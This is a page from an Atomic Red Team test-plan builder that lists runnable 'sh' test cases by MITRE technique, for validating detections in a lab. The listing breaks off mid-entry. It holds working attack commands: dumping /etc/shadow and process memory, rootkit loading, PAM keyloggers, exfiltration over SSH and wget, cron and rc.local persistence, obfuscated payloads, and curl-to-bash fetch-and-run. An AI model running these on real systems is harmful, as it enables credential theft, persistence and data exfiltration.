Home/Atomic Tests
Atomic Red Team

Test-plan builder

Find runnable Atomic Red Team test cases for what you want to validate
Pick a technique, platform, or executor - or search by name - and get the executable test cases. Copy a command, run it on the listed platform in a lab, and confirm your detections fire. Pairs with the Detection Blind Spots on each actor page: see a gap, grab the test that exercises it.
filter by technique id in the URL: /atomic?technique=T1059

Matching tests · sh

400
T1001.002 sh linux Execute Embedded Script in Image via Steganography
Steganography
This atomic test demonstrates the execution of an embedded script in an image file using steganography techniques. The script is first encoded in base64 and then embedded within the pixels of the image. The modified image is created, and the script is extracted and executed on the target system.
cat "#{script}" | base64 | xxd -p | sed 's/../& /g' | xargs -n1 | xxd -r -p | cat "#{image}" - > "#{evil_image}"; strings "#{evil_image}" | tail -n 1 | base64 -d | sh
T1003.007 sh elevated linux Dump individual process memory with sh (Local)
Proc Filesystem
Using /proc/$PID/mem, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later.
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
grep -i "PASS" "#{output_file}"
T1003.007 sh elevated linux Dump individual process memory with sh on FreeBSD (Local)
Proc Filesystem
Using /proc/$PID/mem, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted.
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
MEM_START=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f1)
MEM_STOP=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f2)
MEM_SIZE=$(echo $(($MEM_STOP-$MEM_START)))
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
strings "#{output_file}" | grep -i PASS
T1003.007 sh elevated linux Dump individual process memory with Python (Local)
Proc Filesystem
Using /proc/$PID/mem, where $PID is the target process ID, use a Python script to copy a process's heap memory to an external file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted.
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
PYTHON=$(which python || which python3 || which python2)
$PYTHON #{python_script} $PID #{output_file}
grep -i "PASS" "#{output_file}"
T1003.008 sh elevated linux Access /etc/master.passwd (Local)
/etc/passwd and /etc/shadow
/etc/master.passwd file is accessed in FreeBSD environments
sudo cat /etc/master.passwd > #{output_file}
cat #{output_file}
T1003.008 sh linux Access /etc/passwd (Local)
/etc/passwd and /etc/shadow
/etc/passwd file is accessed in FreeBSD and Linux environments
cat /etc/passwd > #{output_file}
cat #{output_file}
T1003.008 sh elevated linux Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat
/etc/passwd and /etc/shadow
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed
unamestr=$(uname)
if [ "$unamestr" = 'Linux' ]; then echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}; elif [ "$unamestr" = 'FreeBSD' ]; then echo -e "e /etc/passwd\n,p\ne /etc/master.passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}; fi
T1003.008 sh elevated linux Access /etc/{shadow,passwd,master.passwd} with shell builtins
/etc/passwd and /etc/shadow
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins
testcat(){ (while read line; do echo $line >> #{output_file}; done < $1) }
[ "$(uname)" = 'FreeBSD' ] && testcat /etc/master.passwd
testcat /etc/passwd
testcat /etc/shadow
T1005 sh macos Copy Apple Notes database files using AppleScript
Data from Local System
This command will copy Apple Notes database files using AppleScript as seen in Atomic Stealer.
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
T1007 sh macos System Service Discovery - macOS launchctl
System Service Discovery
Enumerates services on macOS using launchctl. Used by adversaries for identifying daemons, background services, and persistence mechanisms.
launchctl list
T1007 sh linux System Service Discovery - Linux init scripts
System Service Discovery
Enumerates system services by listing SysV init scripts and runlevel symlinks under /etc/init.d and /etc/rc*.d.
echo "[*] Listing SysV init scripts (/etc/init.d):"
if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo "/etc/init.d not present on this system"; fi
echo
echo "[*] Listing runlevel directories (/etc/rc*.d):"
ls -ld /etc/rc*.d 2>/dev/null || echo "No /etc/rc*.d directories found"
T1014 sh elevated linux Loadable Kernel Module based Rootkit
Rootkit
Loadable Kernel Module based Rootkit
sudo insmod #{rootkit_path}/#{rootkit_name}.ko
T1014 sh elevated linux Loadable Kernel Module based Rootkit
Rootkit
Loadable Kernel Module based Rootkit
sudo modprobe #{rootkit_name}
T1014 sh elevated linux dynamic-linker based rootkit (libprocesshider)
Rootkit
Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ld.so.preload (see also T1574.006).
echo #{library_path} | tee -a /etc/ld.so.preload
/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
T1014 sh elevated linux Loadable Kernel Module based Rootkit (Diamorphine)
Rootkit
Loads Diamorphine kernel module, which hides itself and a processes.
sudo modprobe #{rootkit_name}
ping -c 10 localhost >/dev/null & TARGETPID="$!"
ps $TARGETPID
kill -31 $TARGETPID
ps $TARGETPID || echo "process ${TARGETPID} hidden"
T1016 sh macos, linux System Network Configuration Discovery
System Network Configuration Discovery
Identify network configuration information. Upon successful execution, sh will spawn multiple commands and output will be via stdout.
if [ "$(uname)" = 'FreeBSD' ]; then cmd="netstat -Sp tcp"; else cmd="netstat -ant"; fi;
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
if [ -x "$(command -v netstat)" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
T1018 sh linux, macos Remote System Discovery - arp nix
Remote System Discovery
Identify remote systems via arp. Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
arp -a | grep -v '^?'
T1018 sh linux, macos Remote System Discovery - sweep
Remote System Discovery
Identify remote systems via ping sweep. Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
T1018 sh linux Remote System Discovery - ip neighbour
Remote System Discovery
Use the ip neighbour command to display the known link layer (ARP table) addresses for hosts sharing the same network segment.
ip neighbour show
T1018 sh linux Remote System Discovery - ip route
Remote System Discovery
Use the ip route command to display the kernels routing tables.
ip route show
T1018 sh linux Remote System Discovery - netstat
Remote System Discovery
Use the netstat command to display the kernels routing tables.
netstat -r | grep default
T1018 sh linux Remote System Discovery - ip tcp_metrics
Remote System Discovery
Use the ip tcp_metrics command to display the recent cached entries for IPv4 and IPv6 source and destination addresses.
ip tcp_metrics show |grep --invert-match "^127\."
T1021.005 sh elevated macos Enable Apple Remote Desktop Agent
VNC
ARD leverages a blend of protocols, including VNC to send the screen and control buffers and SSH for secure file transfer. Adversaries can abuse ARD to gain remote code execution and perform lateral movement. References: https://www.mandiant.com/resources/blog/leveraging-apple-remote-desktop-for-good-and-evil
sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -allowAccessFor -allUsers -privs -all -quiet
T1027 sh macos, linux Decode base64 Data into Script
Obfuscated Files or Information
Creates a base64-encoded data file and decodes it into an executable shell script Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that echoes Hello from the Atomic Red Team and uname -v
if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi;
cat /tmp/encoded.dat | $cmd > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh
T1027.001 sh linux, macos Pad Binary to Change Hash - Linux/macOS dd
Binary Padding
Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash. Upon successful execution, dd will modify /tmp/evil-binary, therefore the expected hash will change.
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes
dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data
dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data
T1027.001 sh linux, macos Pad Binary to Change Hash using truncate command - Linux/macOS
Binary Padding
Uses truncate to add a byte to the binary to change the hash. Upon successful execution, truncate will modify /tmp/evil-binary, therefore the expected hash will change.
truncate -s +1 #{file_to_pad} #adds a byte to the file size
T1027.002 sh linux Binary simply packed by UPX (linux)
Software Packing
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. No other protection/compression were applied.
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
T1027.002 sh linux Binary packed by UPX, with modified headers (linux)
Software Packing
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. The UPX magic number (0x55505821, "UPX!") was changed to (0x4c4f5452, "LOTR"). This prevents the binary from being detected by some methods, and especially UPX is not able to uncompress it any more.
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
T1027.002 sh macos Binary simply packed by UPX
Software Packing
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. No other protection/compression were applied.
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
T1027.002 sh macos Binary packed by UPX, with modified headers
Software Packing
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. The UPX magic number (0x55505821, "UPX!") was changed to (0x4c4f5452, "LOTR"). This prevents the binary from being detected by some methods, and especially UPX is not able to uncompress it any more.
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
T1027.004 sh linux, macos C compile
Compile After Delivery
Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
gcc #{input_file} && ./a.out
clang #{input_file} && ./a.out
T1027.004 sh linux, macos CC compile
Compile After Delivery
Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
g++ #{input_file} && ./a.out
clang++ #{input_file} && ./a.out
T1027.004 sh linux, macos Go compile
Compile After Delivery
Compile a go file with golang on FreeBSD, Linux or Macos.
go run #{input_file}
T1030 sh macos, linux Data Transfer Size Limits
Data Transfer Size Limits
Take a file/directory, split it into 5Mb chunks
cd #{folder_path}; split -b 5000000 #{file_name}
ls -l #{folder_path}
T1033 sh linux, macos System Owner/User Discovery
System Owner/User Discovery
Identify System owner or users on an endpoint Upon successful execution, sh will stdout list of usernames.
users
w
who
T1036.003 sh linux Masquerading as FreeBSD or Linux crond process.
Rename Legitimate Utilities
Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon. Upon successful execution, sh is renamed to crond and executed.
cp /bin/sh /tmp/crond;
echo 'sleep 5' | /tmp/crond
T1036.004 sh linux linux rename /proc/pid/comm using prctl
Masquerade Task or Service
Runs a C program that calls prctl(PR_SET_NAME) to modify /proc/pid/comm value to "totally_legit". This will show up as process name in simple 'ps' listings.
#{exe_path} & ps
TMP=`ps | grep totally_legit`
if [ -z "${TMP}" ] ; then echo "renamed process NOT FOUND in process list" && exit 1; fi
exit 0
T1036.004 sh elevated linux Hiding a malicious process with bind mounts
Masquerade Task or Service
Creates a malicious process and hides it by bind mounting to the /proc filesystem of a benign process
eval '(while true; do :; done) &'
echo $! > /tmp/evil_pid.txt
random_kernel_pid=$(ps -ef | grep "\[.*\]" | awk '{print $2}' | shuf -n 1)
sudo mount -B /proc/$random_kernel_pid /proc/$(cat /tmp/evil_pid.txt)
T1036.005 sh macos, linux Execute a process from a directory masquerading as the current parent directory
Match Legitimate Resource Name or Location
Create and execute a process from a directory masquerading as the current parent directory (... instead of normal ..)
mkdir $HOME/...
cp $(which sh) $HOME/...
$HOME/.../sh -c "echo #{test_message}"
T1036.006 sh macos, linux Space After Filename
Space after Filename
Space after filename.
mkdir -p /tmp/atomic-test-T1036.006
cd /tmp/atomic-test-T1036.006
mkdir -p 'testdirwithspaceend '
[ "$(uname)" = 'FreeBSD' ] && /bin/echo "#\!/bin/sh" > "testdirwithspaceend /init " && echo 'echo "print(\"running T1035.006 with space after filename to masquerade init\")" | python3.9' >> "testdirwithspaceend /init " && echo "exit" >> "testdirwithspaceend /init " || /usr/bin/echo -e "%d\na\n#!/usr/bin/perl\nprint \"running T1035.006 with space after filename to masquerade init\\n\";\nqx/cp \/usr\/bin\/perl 'init  '/;\nqx/'.\/init  ' -e 'sleep 5'/;\n.\nwq\n" | ed 'testdirwithspaceend /init ' >/dev/null
chmod +x 'testdirwithspaceend /init '
'./testdirwithspaceend /init '
T1037.004 sh elevated linux rc.local
RC Scripts
Modify rc.local
filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
[ "$(uname)" = 'FreeBSD' ] && alias python3=python3.9 && printf '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local || printf '#!/bin/bash' | sudo tee /etc/rc.local
echo "\npython3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
printf 'exit 0' | sudo tee -a /etc/rc.local
sudo chmod +x /etc/rc.local
T1037.005 sh elevated macos Add file to Local Library StartupItems
Startup Items
Modify or create an file in /Library/StartupItems [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware)
sudo touch /Library/StartupItems/EvilStartup.plist
T1040 sh elevated linux Packet Capture FreeBSD using tshark or tcpdump
Network Sniffing
Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
T1040 sh elevated linux Packet Capture FreeBSD using /dev/bpfN with sudo
Network Sniffing
Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
sudo #{program_path} -i #{ifname} -t 3
T1040 sh elevated linux Filtered Packet Capture FreeBSD using /dev/bpfN with sudo
Network Sniffing
Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
sudo #{program_path} -f -i #{ifname} -t 3
T1046 sh elevated linux, macos Port Scan Nmap
Network Service Discovery
Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
T1046 sh containers Network Service Discovery for Containers
Network Service Discovery
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
T1046 sh elevated linux, macos Port Scan using nmap (Port range)
Network Service Discovery
Scan multiple ports to check for listening ports with nmap
nmap -Pn -sV -p #{port_range} #{host}
T1048 sh macos, linux Exfiltration Over Alternative Protocol - SSH
Exfiltration Over Alternative Protocol
Input a domain and test Exfiltration over SSH Remote to Local Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
T1048 sh macos, linux Exfiltration Over Alternative Protocol - SSH
Exfiltration Over Alternative Protocol
Input a domain and test Exfiltration over SSH Local to Remote Upon successful execution, tar will compress /Users/* directory and password protect the file modification of Users.tar.gz.enc as output.
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
T1048.002 sh linux Exfiltrate data in a file over HTTPS using wget
Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Exfiltrate data over HTTPS using wget --post-file method
wget --post-file="#{input_file}" --timeout=5 --no-check-certificate #{endpoint_domain} --delete-after
T1048.002 sh linux Exfiltrate data as text over HTTPS using wget
Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Exfiltrate data over HTTPS using wget --post-data method
wget --post-data="msg=AtomicTestT1048.002" --timeout=5 --no-check-certificate #{endpoint_domain} --delete-after
T1048.003 sh linux Python3 http.server
Exfiltration Over Unencrypted Non-C2 Protocol
An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.
[ "$(uname)" = 'FreeBSD' ] && alias python3=python3.9
if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi
T1049 sh linux, macos System Network Connections Discovery FreeBSD, Linux & MacOS
System Network Connections Discovery
Get a listing of network connections. Upon successful execution, sh will execute netstat and who -a. Results will output via stdout.
netstat
who -a
T1049 sh linux System Network Connections Discovery via sockstat (Linux, FreeBSD)
System Network Connections Discovery
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1053.002 sh linux At - Schedule a job
At
This test submits a command to be run in the future by the at daemon.
echo "#{at_command}" | at #{time_spec}
T1053.003 sh linux, macos Cron - Replace crontab with referenced file
Cron
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
T1053.003 sh elevated linux Cron - Add script to /etc/cron.d folder
Cron
This test adds a script to /etc/cron.d folder configured to execute on a schedule.
echo "#{command}" > /etc/cron.d/#{cron_script_name}
T1053.006 sh linux Create a user level transient systemd service and timer
Systemd Timers
Schedule a user level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command.
systemd-run --user --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log'
T1053.006 sh elevated linux Create a system level transient systemd service and timer
Systemd Timers
Schedule a system level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command.
systemd-run --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log'
T1056.001 sh elevated linux Living off the land Terminal Input Capture on Linux with pam.d
Keylogging
Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges. Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command). Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library.
if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi;
if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi;
sudo touch /tmp/password-auth.bk
sudo touch /tmp/system-auth.bk sudo echo "session    required    pam_tty_audit.so
enable=* log_password" >> /etc/pam.d/password-auth sudo echo "session    required    pam_tty_audit.so
enable=* log_password" >> /etc/pam.d/system-auth
T1056.001 sh elevated linux Logging bash history to syslog
Keylogging
There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog. To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
tail /var/log/syslog
T1056.001 sh elevated linux Logging sh history to syslog/messages
Keylogging
There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog. To gain persistence the command could be added to the users .shrc or .profile
PS2=`logger -t "$USER" -f ~/.sh_history`
$PS2
tail /var/log/messages
T1056.001 sh elevated linux SSHD PAM keylogger
Keylogging
Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes.
cp -v /etc/pam.d/sshd /tmp/
echo "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" >> /etc/pam.d/sshd
systemctl restart sshd
systemctl restart auditd
ssh #{user_account}@localhost 
whoami
sudo su
whoami
exit
exit
T1056.001 sh elevated linux Auditd keylogger
Keylogging
The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log.
auditctl -a always,exit -F arch=b64 -S execve -k CMDS 
auditctl -a always,exit -F arch=b32 -S execve -k CMDS
whoami; ausearch -i --start now
T1057 sh linux, macos Process Discovery - ps
Process Discovery
Utilize ps to identify processes. Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
ps >> #{output_file}
ps aux >> #{output_file}
T1059.002 sh macos AppleScript
AppleScript
Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of "t3VhVOs/DyCcDTFzIKanRxkvk3I=", unless 'Little Snitch' is installed, in which case it will just exit. You can use netcat to listen for the connection and verify execution, e.g. use "nc -l 80" in another terminal window before executing this test and watch for the request. Reference: https://github.com/EmpireProject/Empire
osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg=='));\\\" | python &\""
T1059.004 sh linux, macos Create and Execute Bash Shell Script
Unix Shell
Creates and executes a simple sh script.
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 sh linux, macos Command-Line Interface
Unix Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in /tmp/art-fish.txt.
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 sh linux Harvest SUID executable files
Unix Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 sh linux LinEnum tool execution
Unix Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
chmod +x #{linenum}
bash #{linenum}
T1059.004 sh linux New script file in the tmp directory
Unix Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which results in the id command being executed.
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 sh linux What shell is running
Unix Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 sh linux What shells are available
Unix Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
cat /etc/shells
T1059.004 sh linux Command line scripts
Unix Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 sh linux Obfuscated command line scripts
Unix Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 sh linux Environment variable scripts
Unix Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 sh linux Detecting pipe-to-shell
Unix Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
T1059.004 sh linux Current kernel information enumeration
Unix Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
uname -srm
T1059.004 sh linux, macos Shell Creation using awk command
Unix Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 sh linux, macos Creating shell using cpan command
Unix Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 sh linux Shell Creation using busybox command
Unix Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/busybox/
busybox sh &
T1059.004 sh elevated linux, macos emacs spawning an interactive system shell
Unix Shell
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1059.006 sh linux Execute shell script via python's command mode arguement
Python
Download and execute shell script and write to file then execute locally using Python -c (command mode)
which_python=$(which python || which python3 || which python3.9 || which python2)
$which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
T1059.006 sh linux Execute Python via scripts
Python
Create Python file (.py) that downloads and executes shell script via executor arguments
